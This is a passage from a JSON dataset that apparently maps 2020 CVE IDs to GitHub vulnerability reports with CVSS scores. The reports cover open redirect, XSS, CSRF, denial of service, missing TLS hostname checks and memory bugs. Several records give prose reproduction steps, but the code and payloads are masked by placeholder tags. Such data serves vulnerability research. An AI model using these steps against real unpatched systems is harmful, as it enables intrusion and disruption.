  47467. "Issue_Url_old": "https://github.com/Submitty/Submitty/issues/5265",
  47468. "Issue_Url_new": "https://github.com/submitty/submitty/issues/5265",
  47469. "Repo_new": "submitty/submitty",
  47470. "Issue_Created_At": "2020-04-19T16:32:45Z",
  47471. "description": "APITAG Bug] Open Redirection Vulnerability at Login Page. Describe the bug It is possible to redirect a user to an attacker owned domain and trick the user. I am investigating on the potential chaining of this bug to perform other attacks. Expected behavior Redirection to external urls must not be allowed. To Reproduce This occurs at the main login page when the user enters an invalid username/password. The url gets changed to APITAG An attacker can change the url(to any attacker owned domain which may mimic submitty interface) to something like APITAG and trick redirection to google.com users after they enter their creds. Additional context This can be prevented either by NUMBERTAG Adding regex checks on url and whitelisting the url NUMBERTAG Completely removing GET request based url redirection. I am trying to fix this but thought to create this issue for others to contribute the fix if interested.",
  47472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47473. "severity": "MEDIUM",
  47474. "baseScore": 6.1,
  47475. "impactScore": 2.7,
  47476. "exploitabilityScore": 2.8
  47477. },
  47478. {
  47479. "CVE_ID": "CVE-2020-13128",
  47480. "Issue_Url_old": "https://github.com/manolo/gwtupload/issues/33",
  47481. "Issue_Url_new": "https://github.com/manolo/gwtupload/issues/33",
  47482. "Repo_new": "manolo/gwtupload",
  47483. "Issue_Created_At": "2020-02-17T21:17:42Z",
  47484. "description": "Upload delay resulting in APITAG There is a vulnerability which allows to perform APITAG attack against the application server. The problem lies in handling delay parameter when upload is initiated ( APITAG ). Value from this parameter is used as an argument for APITAG invocation. Malicious user can specify even max integer value NUMBERTAG which would cause a thread to sleep for almost NUMBERTAG days ( APITAG ). Additionally, the value from delay parameter is assigned the field which in case of servlets behaves as a global variable. It means every further request will use this value and also will be put to sleep. Putting a thread to sleep excludes it from a limited set of available threads, so after a suitable number of upload requests APITAG by default has limit of NUMBERTAG threads) the whole application will become unresponsive and will not accept any new requests. FILETAG ERRORTAG FILETAG ERRORTAG The same way the servlet accepts APITAG parameter, but its abuse will only prevent from uploading files; the server won't suffer.",
  47485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47486. "severity": "HIGH",
  47487. "baseScore": 7.5,
  47488. "impactScore": 3.6,
  47489. "exploitabilityScore": 3.9
  47490. },
  47491. {
  47492. "CVE_ID": "CVE-2020-13163",
  47493. "Issue_Url_old": "https://github.com/ConradIrwin/em-imap/issues/25",
  47494. "Issue_Url_new": "https://github.com/conradirwin/em-imap/issues/25",
  47495. "Repo_new": "conradirwin/em-imap",
  47496. "Issue_Created_At": "2020-05-18T21:43:41Z",
  47497. "description": "Security vulnerability: missing SSL hostname validation. APITAG Security Lab (GHSL) Vulnerability Report: APITAG The FILETAG team has identified potential security vulnerabilities in em imap URLTAG . We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at APITAG (please include your APITAG ). If you are _NOT_ the correct point of contact for this report, please let us know! Summary Missing hostname validation allows an attacker to perform a man in the middle attack against users of the library. Product em imap Tested Version NUMBERTAG Missing SSL/TLS certificate hostname validation em imap URLTAG uses the library eventmachine URLTAG in an insecure way that allows an attacker to perform a man in the middle attack against users of the library. Impact An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place. Remediation Implement hostname validation. Resources To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets. CODETAG Create a sample client with the following contents: ERRORTAG Run the example client to see a connection being performed in the listening daemon initialized in the previous steps. APITAG References FILETAG APITAG Security Advisories We recommend you create a private APITAG Security Advisory URLTAG for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published URLTAG . Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Gianni) URLTAG . Contact You can contact the GHSL team at APITAG , please include the APITAG in any communication regarding this issue. Disclosure Policy This report is subject to our coordinated disclosure policy URLTAG .",
  47498. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  47499. "severity": "HIGH",
  47500. "baseScore": 7.4,
  47501. "impactScore": 5.2,
  47502. "exploitabilityScore": 2.2
  47503. },
  47504. {
  47505. "CVE_ID": "CVE-2020-13225",
  47506. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/3025",
  47507. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/3025",
  47508. "Repo_new": "phpipam/phpipam",
  47509. "Issue_Created_At": "2020-05-17T10:45:44Z",
  47510. "description": "Stored XSS in User Instructions Widget. Within the Edit User Instructions field where you can enter source code you are able to generate scripting that then executes in the user's browser when they click on the instructions page. POC: APITAG Additionally, APITAG will also execute scripting in the browser. POC video is available here: URLTAG",
  47511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  47512. "severity": "MEDIUM",
  47513. "baseScore": 4.8,
  47514. "impactScore": 2.7,
  47515. "exploitabilityScore": 1.7
  47516. },
  47517. {
  47518. "CVE_ID": "CVE-2020-13226",
  47519. "Issue_Url_old": "https://github.com/wso2/product-apim/issues/7677",
  47520. "Issue_Url_new": "https://github.com/wso2/product-apim/issues/7677",
  47521. "Repo_new": "wso2/product-apim",
  47522. "Issue_Created_At": "2020-03-10T05:23:03Z",
  47523. "description": "Deploy endpoint validation API in API Gateway. Describe your problem(s) Currently, the API endpoint validation ( APITAG ) in the Publisher portal is happening via direct HTTP Head call initiated from the Publisher node. This is less secure when the Publisher node has direct access to other services in the same private network layer. Describe your solution Make endpoint validation request goes through WSO2 API Gateway. How will you implement it Deploy the API APITAG by default for each tenant in API Gateway. If needed, provide admin users with the capability to set rate limiting as well, so that request bursting will be prevented.",
  47524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47525. "severity": "CRITICAL",
  47526. "baseScore": 9.8,
  47527. "impactScore": 5.9,
  47528. "exploitabilityScore": 3.9
  47529. },
  47530. {
  47531. "CVE_ID": "CVE-2020-13226",
  47532. "Issue_Url_old": "https://github.com/wso2/docs-apim/issues/816",
  47533. "Issue_Url_new": "https://github.com/wso2/docs-apim/issues/816",
  47534. "Repo_new": "wso2/docs-apim",
  47535. "Issue_Created_At": "2020-03-10T05:34:53Z",
  47536. "description": "Add n/w level security guideline to to restrict outbound connections of Publisher node.. Description: in a WSO2 API M deployment, we recommend restricting outbound connections of the Publisher node only to the required internal nodes (only to the nodes which Publisher portal is intended to communicate with) of the deployment. So even if privileged user credentials were exploited to a user with malicious intent, they cannot perform network scans using the existing functionlities against the other services exposed in the same private network of Publisher node.",
  47537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47538. "severity": "CRITICAL",
  47539. "baseScore": 9.8,
  47540. "impactScore": 5.9,
  47541. "exploitabilityScore": 3.9
  47542. },
  47543. {
  47544. "CVE_ID": "CVE-2020-13230",
  47545. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3343",
  47546. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3343",
  47547. "Repo_new": "cacti/cacti",
  47548. "Issue_Created_At": "2020-03-11T14:37:20Z",
  47549. "description": "Improper Access Control on disabling a user.. Describe the bug Cacti admin console provides a functionality to disable a created user which takes his privileges to perform any action but if a page is auto refreshed a disabled user can view updated data. To Reproduce Steps to reproduce the behavior NUMBERTAG Log in with Admin account and navigate to URLTAG NUMBERTAG Give the new user permission to view logs NUMBERTAG Login to new user's account and navigate FILETAG NUMBERTAG From Admin's account disable the created user. Actual behavior A disabled user can view the system logs and the logs are even updating after the refresh time. Expected behavior A disabled user should not be privileged to view the system logs. OS: Ubuntu Browser: Firefox Version Cacti NUMBERTAG",
  47550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47551. "severity": "MEDIUM",
  47552. "baseScore": 4.3,
  47553. "impactScore": 1.4,
  47554. "exploitabilityScore": 2.8
  47555. },
  47556. {
  47557. "CVE_ID": "CVE-2020-13231",
  47558. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3342",
  47559. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3342",
  47560. "Repo_new": "cacti/cacti",
  47561. "Issue_Created_At": "2020-03-11T13:32:33Z",
  47562. "description": "CSRF at Admin Email. Describe the bug A malformed GET request at URLTAG can lead to admin email change. Affected URI URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' URLTAG NUMBERTAG Turn on a proxy interceptor, I used Burp NUMBERTAG Change the email and save the request NUMBERTAG Change the email in the saved request and send the URL to a logged in admin NUMBERTAG Admin email will be changed Malformed Request: FILETAG Expected behavior Such actions should not be requested with GET method and anti CSRF tokens should be used. OS: Ubuntu Browser: Firefox Version: Cacti Version NUMBERTAG",
  47563. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  47564. "severity": "MEDIUM",
  47565. "baseScore": 6.5,
  47566. "impactScore": 3.6,
  47567. "exploitabilityScore": 2.8
  47568. },
  47569. {
  47570. "CVE_ID": "CVE-2020-13246",
  47571. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/10549",
  47572. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/10549",
  47573. "Repo_new": "go-gitea/gitea",
  47574. "Issue_Created_At": "2020-03-01T08:47:20Z",
  47575. "description": "Server freezes when transferring the ownership. Gitea version (or commit ref NUMBERTAG Git version NUMBERTAG Operating system: Debian NUMBERTAG Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [x] APITAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [x] No [ ] Not relevant Log gist: Description Today I encountered a strange bug. When I transfer a mirror repository, the server freezes until I manually restart it. I checked the console and log and I don't see any error or warning. When I re migrated the same repository from Github and try to transfer it, it succeeded. But the problem with the old repository persisted. Screenshots",
  47576. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47577. "severity": "HIGH",
  47578. "baseScore": 7.5,
  47579. "impactScore": 3.6,
  47580. "exploitabilityScore": 3.9
  47581. },
  47582. {
  47583. "CVE_ID": "CVE-2020-13258",
  47584. "Issue_Url_old": "https://github.com/contentful/the-example-app.py/issues/44",
  47585. "Issue_Url_new": "https://github.com/contentful/the-example-app.py/issues/44",
  47586. "Repo_new": "contentful/the-example-app.py",
  47587. "Issue_Created_At": "2020-05-21T13:52:53Z",
  47588. "description": "Reflected Xss. Hi Team I found a reflected xss vulnerability. Proof of concept: URLTAG \" APITAG APITAG alert NUMBERTAG APITAG &locale=en US",
  47589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47590. "severity": "MEDIUM",
  47591. "baseScore": 6.1,
  47592. "impactScore": 2.7,
  47593. "exploitabilityScore": 2.8
  47594. },
  47595. {
  47596. "CVE_ID": "CVE-2020-13429",
  47597. "Issue_Url_old": "https://github.com/grafana/piechart-panel/issues/218",
  47598. "Issue_Url_new": "https://github.com/grafana/piechart-panel/issues/218",
  47599. "Repo_new": "grafana/piechart-panel",
  47600. "Issue_Created_At": "2020-02-05T14:23:34Z",
  47601. "description": "XSS flaw in piechart panel. The pie chart panel is potentially vulnerable to XSS scripting as it processes any javascript in the APITAG Header\" configuration option. e.g. APITAG FILETAG",
  47602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47603. "severity": "MEDIUM",
  47604. "baseScore": 5.4,
  47605. "impactScore": 2.7,
  47606. "exploitabilityScore": 2.3
  47607. },
  47608. {
  47609. "CVE_ID": "CVE-2020-13438",
  47610. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/23",
  47611. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/23",
  47612. "Repo_new": "rockcarry/ffjpeg",
  47613. "Issue_Created_At": "2020-05-23T17:08:31Z",
  47614. "description": "SEGV in function jfif_encode in APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is segv_ffjpeg_e2 segv_ffjpeg_e2 . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG The gdb reports: CODETAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
  47615. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  47616. "severity": "MEDIUM",
  47617. "baseScore": 6.5,
  47618. "impactScore": 3.6,
  47619. "exploitabilityScore": 2.8
  47620. },
  47621. {
  47622. "CVE_ID": "CVE-2020-13439",
  47623. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/24",
  47624. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/24",
  47625. "Repo_new": "rockcarry/ffjpeg",
  47626. "Issue_Created_At": "2020-05-23T17:09:21Z",
  47627. "description": "heap buffer overflow in function jfif_decode at APITAG Tested in Ubuntu NUMBERTAG bit. The tesecase is heap buffer overflow_ffjpeg_d1 CVETAG . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG The gdb reports (absolute path information omitted):: CODETAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
  47628. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  47629. "severity": "MEDIUM",
  47630. "baseScore": 6.5,
  47631. "impactScore": 3.6,
  47632. "exploitabilityScore": 2.8
  47633. },
  47634. {
  47635. "CVE_ID": "CVE-2020-13440",
  47636. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/22",
  47637. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/22",
  47638. "Repo_new": "rockcarry/ffjpeg",
  47639. "Issue_Created_At": "2020-05-23T17:07:53Z",
  47640. "description": "SEGV in function bmp_load at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is segv_ffjpeg_e1 CVETAG . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
  47641. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  47642. "severity": "MEDIUM",
  47643. "baseScore": 6.5,
  47644. "impactScore": 3.6,
  47645. "exploitabilityScore": 2.8
  47646. },
  47647. {
  47648. "CVE_ID": "CVE-2020-13449",
  47649. "Issue_Url_old": "https://github.com/thecodingmachine/gotenberg/issues/199",
  47650. "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/199",
  47651. "Repo_new": "gotenberg/gotenberg",
  47652. "Issue_Created_At": "2020-05-25T07:00:23Z",
  47653. "description": "Critical vulnerability. Hi there, I have identified several vulnerabilities in Gotenberg which all lead to arbitrary code execution in the container. Following responsible disclosure model I would like to give contributors more details so that you could fix this. MENTIONTAG : please provide some e mail and pgp key so that I can contact you securely. After fix I'm planning to make a disclosure on seclists. I have also requested CVE IDs for the issues. Best regards!",
  47654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47655. "severity": "HIGH",
  47656. "baseScore": 7.5,
  47657. "impactScore": 3.6,
  47658. "exploitabilityScore": 3.9
  47659. },
  47660. {
  47661. "CVE_ID": "CVE-2020-13482",
  47662. "Issue_Url_old": "https://github.com/igrigorik/em-http-request/issues/339",
  47663. "Issue_Url_new": "https://github.com/igrigorik/em-http-request/issues/339",
  47664. "Repo_new": "igrigorik/em-http-request",
  47665. "Issue_Created_At": "2020-05-24T21:28:35Z",
  47666. "description": "Security vulnerability: missing SSL hostname validation. APITAG Security Lab (GHSL) Vulnerability Report: APITAG Summary Missing hostname validation allows an attacker to perform a man in the middle attack against users of the library. Product em http request Tested Version NUMBERTAG Missing SSL/TLS certificate hostname validation em http request URLTAG uses the library eventmachine URLTAG in an insecure way that allows an attacker to perform a man in the middle attack against users of the library. Impact An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place. Remediation Implement hostname validation. Resources To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets. ERRORTAG Create a sample client with the following contents: ERRORTAG Run the example client to see a connection being performed in the listening daemon initialized in the previous steps. APITAG References FILETAG APITAG Security Advisories We recommend you create a private APITAG Security Advisory URLTAG for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published URLTAG . Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Gianni) URLTAG .",
  47667. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  47668. "severity": "HIGH",
  47669. "baseScore": 7.4,
  47670. "impactScore": 5.2,
  47671. "exploitabilityScore": 2.2
  47672. },
  47673. {
  47674. "CVE_ID": "CVE-2020-13597",
  47675. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/91507",
  47676. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/91507",
  47677. "Repo_new": "kubernetes/kubernetes",
  47678. "Issue_Created_At": "2020-05-27T19:32:29Z",
  47679. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  47680. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
  47681. "severity": "LOW",
  47682. "baseScore": 3.5,
  47683. "impactScore": 1.4,
  47684. "exploitabilityScore": 1.8
  47685. },
  47686. {
  47687. "CVE_ID": "CVE-2020-13614",
  47688. "Issue_Url_old": "https://github.com/axel-download-accelerator/axel/issues/262",
  47689. "Issue_Url_new": "https://github.com/axel-download-accelerator/axel/issues/262",
  47690. "Repo_new": "axel-download-accelerator/axel",
  47691. "Issue_Created_At": "2020-03-16T22:55:56Z",
  47692. "description": "Axel may not verify server certificate PATHTAG (allowing SSL interception). It looks like Axel's SSL's connections do not verify server certificate hostnames. To fix this the SSL context should set a certificate callback or use APITAG to set the intended hostname. This is an issue since it uses APITAG and loads all root authorities from the OS. See URLTAG for a description of this nuance with the APITAG APIs. Here is potentially insecure code URLTAG CODETAG",
  47693. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47694. "severity": "MEDIUM",
  47695. "baseScore": 5.9,
  47696. "impactScore": 3.6,
  47697. "exploitabilityScore": 2.2
  47698. },
  47699. {
  47700. "CVE_ID": "CVE-2020-13615",
  47701. "Issue_Url_old": "https://github.com/qorelanguage/qore/issues/3808",
  47702. "Issue_Url_new": "https://github.com/qorelanguage/qore/issues/3808",
  47703. "Repo_new": "qorelanguage/qore",
  47704. "Issue_Created_At": "2020-03-04T06:46:33Z",
  47705. "description": "Qore does not perform hostname validation during certification NUMBERTAG alidation. see: URLTAG",
  47706. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47707. "severity": "MEDIUM",
  47708. "baseScore": 5.9,
  47709. "impactScore": 3.6,
  47710. "exploitabilityScore": 2.2
  47711. },
  47712. {
  47713. "CVE_ID": "CVE-2020-13622",
  47714. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3787",
  47715. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3787",
  47716. "Repo_new": "jerryscript-project/jerryscript",
  47717. "Issue_Created_At": "2020-05-23T17:53:33Z",
  47718. "description": "Assertion 'ecma_is_value_string (value)' failed at PATHTAG APITAG APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  47719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47720. "severity": "HIGH",
  47721. "baseScore": 7.5,
  47722. "impactScore": 3.6,
  47723. "exploitabilityScore": 3.9
  47724. },
  47725. {
  47726. "CVE_ID": "CVE-2020-13623",
  47727. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3785",
  47728. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3785",
  47729. "Repo_new": "jerryscript-project/jerryscript",
  47730. "Issue_Created_At": "2020-05-23T08:58:58Z",
  47731. "description": "Stack Exhaustion (ecma_proxy_object_get, ecma_proxy_object_set). APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test cases APITAG APITAG",
  47732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47733. "severity": "HIGH",
  47734. "baseScore": 7.5,
  47735. "impactScore": 3.6,
  47736. "exploitabilityScore": 3.9
  47737. },
  47738. {
  47739. "CVE_ID": "CVE-2020-13649",
  47740. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3788",
  47741. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3788",
  47742. "Repo_new": "jerryscript-project/jerryscript",
  47743. "Issue_Created_At": "2020-05-23T17:56:43Z",
  47744. "description": "Assertion 'context_p >error == PARSER_ERR_NO_ERROR' failed at PATHTAG (scanner_scan_all NUMBERTAG APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  47745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47746. "severity": "HIGH",
  47747. "baseScore": 7.5,
  47748. "impactScore": 3.6,
  47749. "exploitabilityScore": 3.9
  47750. },
  47751. {
  47752. "CVE_ID": "CVE-2020-13649",
  47753. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3786",
  47754. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3786",
  47755. "Repo_new": "jerryscript-project/jerryscript",
  47756. "Issue_Created_At": "2020-05-23T17:46:47Z",
  47757. "description": "NULL dereference in scanner_reverse_info_list. APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG CODETAG",
  47758. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47759. "severity": "HIGH",
  47760. "baseScore": 7.5,
  47761. "impactScore": 3.6,
  47762. "exploitabilityScore": 3.9
  47763. },
  47764. {
  47765. "CVE_ID": "CVE-2020-13757",
  47766. "Issue_Url_old": "https://github.com/sybrenstuvel/python-rsa/issues/146",
  47767. "Issue_Url_new": "https://github.com/sybrenstuvel/python-rsa/issues/146",
  47768. "Repo_new": "sybrenstuvel/python-rsa",
  47769. "Issue_Created_At": "2020-05-27T08:11:51Z",
  47770. "description": "python rsa does not detect ciphertext modification (prepended NUMBERTAG bytes) in PKCS NUMBERTAG Hello, Using this testcase from Google Wycheproof: ERRORTAG CODETAG I found that python rsa (I'm using python rsa NUMBERTAG does not detect if bytes NUMBERTAG have been prepended to the ciphertext using NUMBERTAG and NUMBERTAG bit keys and it decrypts the ciphertext without error. However, python rsa detects if bytes NUMBERTAG have been appended to the ciphertext and does not decrypt the ciphertext. You can see this behaviour with NUMBERTAG and NUMBERTAG bit keys and the testvectors from Google Wycheproof below NUMBERTAG bit test vector: ERRORTAG NUMBERTAG bit test vector: ERRORTAG NUMBERTAG bit test vector: ERRORTAG On the other hand, pcryptodome detects whenever bytes NUMBERTAG are prepended to the ciphertext: ERRORTAG Best regards, Antonio",
  47771. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47772. "severity": "HIGH",
  47773. "baseScore": 7.5,
  47774. "impactScore": 3.6,
  47775. "exploitabilityScore": 3.9
  47776. },
  47777. {
  47778. "CVE_ID": "CVE-2020-13759",
  47779. "Issue_Url_old": "https://github.com/rust-vmm/vm-memory/issues/93",
  47780. "Issue_Url_new": "https://github.com/rust-vmm/vm-memory/issues/93",
  47781. "Repo_new": "rust-vmm/vm-memory",
  47782. "Issue_Created_At": "2020-05-28T06:48:20Z",
  47783. "description": "APITAG issue when using virtio with rust vmm/vm memory. We have identified an issue in the rust vmm vm memory crate that leads to a denial of service APITAG issue if the crate is used in a VMM in conjunction with virtio. The issue affects both vm memory releases NUMBERTAG and NUMBERTAG In our environment, we reproduced this with musl builds on NUMBERTAG and with all aarch NUMBERTAG builds. Issue Description In vm memory, the functions read_obj and write_obj are not doing atomic accesses for all combinations of platform and libc implementations. These reads and writes translate to memcpy, which may be performing byte by byte copies. Using vm memory in the virtio implementation can cause undefined behavior, as descriptor indexes require NUMBERTAG byte atomic accesses. Impact The issue can affect any virtio/emulated device which expects atomic writes for base types longer than NUMBERTAG byte. Observed impact: When the network stack is under load, the driver will try to clear a used descriptor before the index of the descriptor is fully written by the device. When this issue is triggered, the virtio net device will be unable to transmit packets. This leads to VMs using rust vmm/vm memory having their network effectively disconnected by outside network traffic, resulting in both a APITAG vector and an availability issue under normal at load operations. Affected Systems For a VMM to be affected, it must run on aarch NUMBERTAG built with either musl or glibc), or on NUMBERTAG with a musl build. All VMMs using rust vmm/vm memory (any release) in a production scenario, and that take arbitrary traffic over the virtio net device, are confirmed to be at risk of a DOS. All VMMs using rust vmm/vm memory (any release) in a production scenario with a virtio net deice are under availability risk. All VMMs using rust vmm/vm memory (any release) in a production scenario using other devices that expect atomic reads for more than NUMBERTAG byte values may also be affected, but we are unaware of any risk for other devices (beyond the guest freezing its own virtio stack).",
  47784. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47785. "severity": "HIGH",
  47786. "baseScore": 7.5,
  47787. "impactScore": 3.6,
  47788. "exploitabilityScore": 3.9
  47789. },
  47790. {
  47791. "CVE_ID": "CVE-2020-13776",
  47792. "Issue_Url_old": "https://github.com/systemd/systemd/issues/15985",
  47793. "Issue_Url_new": "https://github.com/systemd/systemd/issues/15985",
  47794. "Repo_new": "systemd/systemd",
  47795. "Issue_Created_At": "2020-05-31T09:13:53Z",
  47796. "description": "User names beginning with NUMBERTAG being interpreted as user identifiers. Version the issue has been seen with > APITAG APITAG and master APITAG APITAG APITAG Used distribution > Ubuntu NUMBERTAG LTS Expected behaviour you didn't see > APITAG > > ERRORTAG Unexpected behaviour you saw > APITAG > > APITAG Steps to reproduce the problem NUMBERTAG Create a user whose name starts with APITAG or APITAG (_exempli gratia:_ APITAG NUMBERTAG Log in with that user name and run APITAG NUMBERTAG Check the unexpected behavior above. Related issues > Symptoms are similar to NUMBERTAG Affected code URLTAG",
  47797. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
  47798. "severity": "MEDIUM",
  47799. "baseScore": 6.7,
  47800. "impactScore": 5.9,
  47801. "exploitabilityScore": 0.8
  47802. },
  47803. {
  47804. "CVE_ID": "CVE-2020-13790",
  47805. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433",
  47806. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433",
  47807. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  47808. "Issue_Created_At": "2020-05-25T18:37:38Z",
  47809. "description": "Heap based buffer over read in APITAG in rdppm.c. Have you searched the existing issues (both open and closed) in the libjpeg turbo issue tracker to ensure that this bug report is not a duplicate? Yes Does this bug report describe one of the FILETAG ? No Clear and concise description of the bug: Heap based buffer over read in APITAG in rdppm.c Steps to reproduce the bug (using only libjpeg turbo): Compile with Address Sanitizer APITAG : ./cjpeg ./reproducer Without APITAG valgrind q ./cjpeg ./reproducer Image(s) needed in order to reproduce the bug (if applicable): FILETAG Expected behavior: Observed behavior: ERRORTAG Platform(s) (compiler version, operating system version, CPU) on which the bug was observed: gcc APITAG NUMBERTAG ubuntu NUMBERTAG Linu NUMBERTAG generic libjpeg turbo release(s), commit(s), or branch(es) in which the bug was observed (always test the tip of the master branch or the latest stable pre release URLTAG to verify that the bug hasn't already been fixed): libjpeg turbo version NUMBERTAG master) If the bug is a regression, the specific commit that introduced the regression (use git bisect to determine this): Additional information:",
  47810. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  47811. "severity": "HIGH",
  47812. "baseScore": 8.1,
  47813. "impactScore": 5.2,
  47814. "exploitabilityScore": 2.8
  47815. },
  47816. {
  47817. "CVE_ID": "CVE-2020-13822",
  47818. "Issue_Url_old": "https://github.com/indutny/elliptic/issues/226",
  47819. "Issue_Url_new": "https://github.com/indutny/elliptic/issues/226",
  47820. "Repo_new": "indutny/elliptic",
  47821. "Issue_Created_At": "2020-06-01T09:49:31Z",
